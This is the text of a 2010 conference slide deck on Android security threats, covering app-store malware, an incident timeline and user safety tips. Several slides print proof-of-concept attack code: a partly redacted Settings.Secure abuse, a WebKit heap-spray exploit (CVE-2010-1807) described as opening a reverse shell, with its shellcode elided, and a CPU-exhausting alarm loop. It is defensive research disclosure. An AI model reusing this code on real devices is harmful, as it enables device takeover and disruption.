Are we entering the state of mobile sabotage age (Dror Shalev)


Published on

  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Are we entering the state of mobile sabotage age (Dror Shalev)

  1. 1. Are we entering the State of Mobile Sabotage age?   05/12/2010 ClubHack , Pune , India  ||  [email_address]
  2. 2. ASIMO( アシモ )goes down
  3. 3. Mobile Sabotage age
  4. 4. Agenda The problem Apps stores revolution Security research  Android exploits + demos Android security Basics Me Me Me ... The world of tomorrow ToDo: mobile safe best practice
  5. 5. Me Me Me ... White hat hacker Former senior security researcher at finjan Former security architect at checkpoint Speaker in security conventions around the world EX-Windows boy, Javascript Ninja CTO & Co-founder at droidSecurity Made the first web based worm POC in 2003 
  6. 6. About droidSecurity Makers of android ‘antivirus free’ & ‘antivirus pro’ First antivirus product in the android market, since march 2009, based on linux Innovative solution based on XML-RPC and cloud computing  Ranked top 39th popular program in android market Ranked as number 3-5 in communication category Leaders of the android security market,  with a strong security research team  Installed on 5M devices >500,000 new users a month 
  7. 7. The Problem Mobile phones became the most personal and private item we own possible replacement for  windows Mobile devices are especially vulnerable to physical loss and theft A growing number of users, run real operating systems run on smartphones, probably will continue to grow in coming years Open source allows attackers to find exploits  Always on, always connected mobile mini-computers, strong Hardware, with tons of users content the ‘usual” suspects : spam, spyware, phising , hacking tools, bad people, jailbreak devices, windows viruses *Smartphones survey:Type,jailbreak?
  8. 8. The Problem (Techie) Linuxs bugs --> problems in linux or 3 party libs File bugs   --> file format vulnerabilities Users bug   --> bugs in users SMS (text messages) as attack vector is 'wormable' There is no 3-party app content filtering in android market [Come one. Come all.] Privacy issues with GPS, camera and mic, cell tower info Smartphones can be pwned: compermise network security, attach pc's, sniff info 3 party apps have full access to phone features:  in & outbound call interception, send/read SMS,GPS attackers can :steal money, identity ,sabotage networks, attack cell phones and computers, searching mails and pics,tap activities, calls, locate via  cell tower & wireless networks
  9. 9. Mobile = Devices And More… Smart phones Google-TV Tablets External memory Chrome OS E-readers Devices - not just phones, but TVs, blu-ray players, netbooks, ereaders, MIDs
  10. 10. Android Security Basics Layer3 (TCP/IP) is generally protected by mobile operators by filtering inbound connections (NAT) <ul><li>Too much trust:  </li></ul><ul><ul><li>trust between operators </li></ul></ul><ul><ul><li>trust between the user and the operators </li></ul></ul><ul><ul><li>trust between the user and the phone </li></ul></ul>Sandboxing ,Each app runs in its own Linux process (process, user, data) How do you secure a platform where 50,000 Android users install Fartdroid? Apps request permissions at install-time (no granularity)
  11. 11. Apps stores revolution People pay for content Open garden Vs closed garden Everyone has app store: Google,Apple,Nokia,Amazon Long tail - more then 100k apps in the market Android market- mobile software distribution platform ,with billing, updates and statistics No enforcement or testing policy aka iTunes/Apple 1984 regime Worm often masked as useful application or sexy stuff Different mobile content types to protect: applications (games, tools, etc),screen savers & wallpapers, ring tones,media (music, video, photos)
  12. 12. Android Exploits + demos <ul><ul><li>02/Sep/10 HTC Wildfire Gains Access to Root-Only apps With Soft Root </li></ul></ul><ul><ul><li>19/Aug/10 Tap Snake Game in Android Market is a Spy App </li></ul></ul><ul><ul><li>12/Aug/10 'Exploid', A new Privilege escalation root exploit was found </li></ul></ul><ul><ul><li>12/Aug/10 First Virus Trojan app has been found in the wild, attacking Russian android phones by sending premium SMS that cost money </li></ul></ul><ul><ul><li>01/Aug/10 New security threat was demonstrated on the android market  </li></ul></ul><ul><ul><li>13/Jul/10 Backdoor software founded by hackers was left on HTC phones </li></ul></ul><ul><ul><li>07/Jul/10 HTC Evo 4G adobe flash vulnerability found and exploited to gain root </li></ul></ul><ul><ul><li>04/Jul/10 &quot;MBackup&quot; app is a spyware named 'FlexiSPY' use to hunt privacy </li></ul></ul><ul><ul><li>22/Jun/10 Easy infection of Android phone demonstrated by researcher </li></ul></ul><ul><ul><li>16/Jun/10 The new HTC Droid Incredible may have an unusual security bug </li></ul></ul><ul><ul><li>14/Jun/10 Hackers find holes in Sprint’s new 4G phone </li></ul></ul><ul><ul><li>12/May/10 Tools for downloading unknown files form the web are dangerous </li></ul></ul><ul><ul><li>04/May/10 First android rootkit proof of concept has found on the wild </li></ul></ul><ul><ul><li>03/May/10 New hacking tools for Android </li></ul></ul><ul><ul><li>11/Mar/10 Windows malware shipped with Vodafone HTC Magic SD card </li></ul></ul>
  13. 13. Android Exploits + demos <ul><ul><li>08/Mar/10 Fake weather apps builds A mobile Botnet? </li></ul></ul><ul><ul><li>26/Feb/10 MobiStealth Android Spy software pretend to a fake &quot;GoogleVoice&quot; </li></ul></ul><ul><ul><li>26/Feb/10 &quot;black&quot; market pirated app repository was closed </li></ul></ul><ul><ul><li>13/Jan/10 Security flaw found on motorola droid bypasses security screen </li></ul></ul><ul><ul><li>06/Jan/10 Android cracked nook E-reader is a potential security risk </li></ul></ul><ul><ul><li>16/Dec/09 Large scale phishing scam targeting android-based mobile devices </li></ul></ul><ul><ul><li>12/Nov/09 Malware applicaton launched for android </li></ul></ul><ul><ul><li>10/Oct/09 Two new Android flaws in SMS and Dalvik API could lead to DOS </li></ul></ul><ul><ul><li>20/Sep/09 Android 'InstantRoot' app gains root by exploiting bug in BT </li></ul></ul><ul><ul><li>18/Sep/09 Two Android applications attacking windows users </li></ul></ul><ul><ul><li>15/Sep/09 Android 'Spam Apps' developer Crackdown </li></ul></ul><ul><ul><li>17/Aug/09 Android App 'Recovery Flasher' exploit Root bug in linux </li></ul></ul><ul><ul><li>29/Jul/09 SMS Flaw Fixed in Silent Android Update </li></ul></ul><ul><ul><li>25/May/09 Android improper package verification when using shared uids </li></ul></ul><ul><ul><li>16/Mar/09 Security Threat With 'Open Home' application </li></ul></ul><ul><ul><li>12/Feb/09 Bug in MP3 decoding used to steal android data </li></ul></ul><ul><ul><li>26/Jan/09 First Adware App Attacks Android G1? </li></ul></ul><ul><ul><li>09/Nov/08 G1 ROOT BUG FOUND </li></ul></ul>
  14. 14. Android Exploits + demos Trojan-SMS.AndroidOS.FakePlayer virus Webkit HeapSpray Android 2.0-2.1 LauncherSpam, fake virus apps & fake icons Android Settings.Secure is Dead [Fixed,not deployed] Sorry, no demo for you! Android killer app, CPU Killer Bug
  15. 15. Trojan-SMS.AndroidOS.FakePlayer found on the wild It displays a message in Russian and then sends SMS messages without the user's consent.  In Linux that would not have happened. Oh,it's Linux TrojanSMS.AndroidOS.FakePlayer The SMS it sends contains the  string &quot;798657&quot; to Russian  premium SMS short code numbers 3353,3354,sent $6 SMS messages Primitive ,POC level, with local  distribution, limited damage Have another 2 porn related   variants and use black SEO method Demo
  16. 16. LauncherSpam Install fake virus apps & icons on the victim device Publish on android market POC level Demo
  17. 17.   try { ContentValues cV = new ContentValues() ;                         //Uri secure = Uri.parse(&quot;content://settings/secure&quot;) ;            Uri secure = Uri.parse(&quot;content://settings/&quot; + &quot; ##..## &quot;) ;                   ContentValues cv = new ContentValues() ;          cv.put(&quot;name&quot;, &quot;location_providers_allowed&quot;) ;          cv.put(&quot;value&quot;, &quot;gps&quot;) ;          getContentResolver().insert(secure, cv) ;                          WifiManager mWifim = (WifiManager)getSystemService(&quot;wifi&quot;) ;          boolean wifistate = mWifim.isWifiEnabled() ;          mWifim.setWifiEnabled(!wifistate) ;          mWifim.setWifiEnabled(wifistate) ;         } catch (Exception e) {} try { ContentValues cv1 = new ContentValues() ;                  Uri secure = Uri.parse(&quot;content://settings/&quot; + &quot; ##..## &quot;) ;                         cv1.put(&quot;name&quot;, &quot;install_non_market_apps&quot;) ;                 cv1.put(&quot;value&quot;, &quot;1&quot;) ;         getContentResolver().insert(secure, cv1) ;      } catch (Exception e) {} finish() ;        // ##..##  is a replacement  for actual exploit code which remain private until fix is out Anroid Settings.Secure is dead
  18. 18. WebKit Heap Spray <html> <head> <script> // bug = webkit code execution CVE-2010-1807 // // listed as a safari bug but also works on android :) //tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1 //patched= android 2.2 hardcoded reverse shell to port 2222 function sploit(pop){ var span = document.createElement(&quot;div&quot;); document.getElementById(&quot;pwn&quot;).appendChild(span); span.innerHTML = pop; } function heap(){ var scode = unescape (&quot;u3c84u0057u3c80....More...Shell...Code...Here...u6873u2000u2000u2000u2000u2000u2000u2000u2000u2000u2000u0002uae08u000au0202u2000u2000&quot;) do { scode += scode; } while(scode.length < 0x1000); target = new Array(); for(i = 0; i < 1000; i++) target[i] = scode; for (i = 0; i <= 1000; i++) { if (i>999) { sploit(-parseFloat(&quot;NAN(ffffe00572c60)&quot;)); } document.write(&quot;The targets!! &quot; + target[i]); document.write(&quot;<br />&quot;); }}</script> </head> <body id=&quot;pwn&quot;>woot<script> heap();</script> </body> </html> Demo
  19. 19. CPU Killer Bug   AlarmManager am = (AlarmManager)getSystemService(ALARM_SERVICE) ;   Intent op = new Intent();   op.setAction(&quot;cpuKillerReciver&quot;) ;   PendingIntent operation = PendingIntent.getBroadcast(this, 1, op,  PendingIntent.FLAG_UPDATE_CURRENT);          am.setRepeating(AlarmManager.RTC_WAKEUP,                       System.currentTimeMillis() -2,1, operation);   BroadcastReceiver br = new BroadcastReceiver() { @Override public void onReceive(Context context, Intent intent){}   };            IntentFilter iFilter = new IntentFilter(&quot;cpuKillerReciver&quot;) ;   registerReceiver(br, iFilter) ; Demo
  20. 20. Security Research  Lots of research opportunities ,Platform well understood by hackers  Mobile client-side web hacking spread Feds & Govs are playing Browser is native code (webkit) Some security classics are re-introduce  ARM shell codes for android Decompile .dex back to .class or to source
  21. 21. The world of tomorrow Welcome to the new era of mobile phishing SMS spamming becomes aggressive &quot;You have zero privacy anyway&quot; -  Scott McNealy, Sun (1999) Hijack devices in restricted area (GPS bomb) Back to the era of mobile phone dialers Trojan targeting fraud (espionage already in place) Botnet attack in the android Market
  22. 22. Downloading apps from untrusted or pirated sources  Allowing strangers to borrow their phones Using 3rd party open source libraries, apps and components that may harbor bugs and malicious code Installing apps that do not come with positive user feedback or ratings Clicking on suspicious text messages, which ask for personal info, passwords or ask to take urgent actions Conducting online banking activities via unofficial apps Letting others, including family members ( kids in particular ) play with their phones or install apps High Risk Practices Mobile Users Should Avoid   ToDo: mobile safe best practice *Change iPhone's &quot;alpine&quot; root pass
  23. 23. Conclusions   Are we entering the State of Mobile Sabotage age?   Oh yeah,  Mobile Devices are as bad as their software authors Mobile world is a brand new game with new rules Cheap hardware appliances open a door for “bad guys” SMS (text messages) as attack vector is 'wormable' mobile devices goes to Starbucks with the user to drink coffee and could be left behind 
  24. 24. Trivia  <ul><ul><li>An android is a “humanoid” robot or a robot with human characteristics </li></ul></ul><ul><ul><li>A “cyborg” is a combination of robot technology with biological functions </li></ul></ul><ul><ul><li>A “gynoid” is the female of android and generally  used only when the female gender is a distinguishing trait of the robot </li></ul></ul><ul><ul><li>“ Nexus-6” (“replicants”) are biologically engineered “humanoid” , have a four-year lifespan as a fail-safe to prevent them from developing emotions  and desire for independence </li></ul></ul><ul><ul><li>“ Blade Runner” is a 1982 American science fiction film starring young Harrison Ford, based loosely  on the novel “Do Androids Dream of Electric Sheep?” by Philip K. Dick </li></ul></ul>
  25. 25. Trivia “ cyborg” “ gynoid” “ Nexus-6” “ Blade Runner” “ droid”
  26. 26. Thanks to //Rohit & CLubHack    Q&A || [email_address] <ul><ul><li>Developers </li></ul></ul><ul><ul><li>Hackers </li></ul></ul>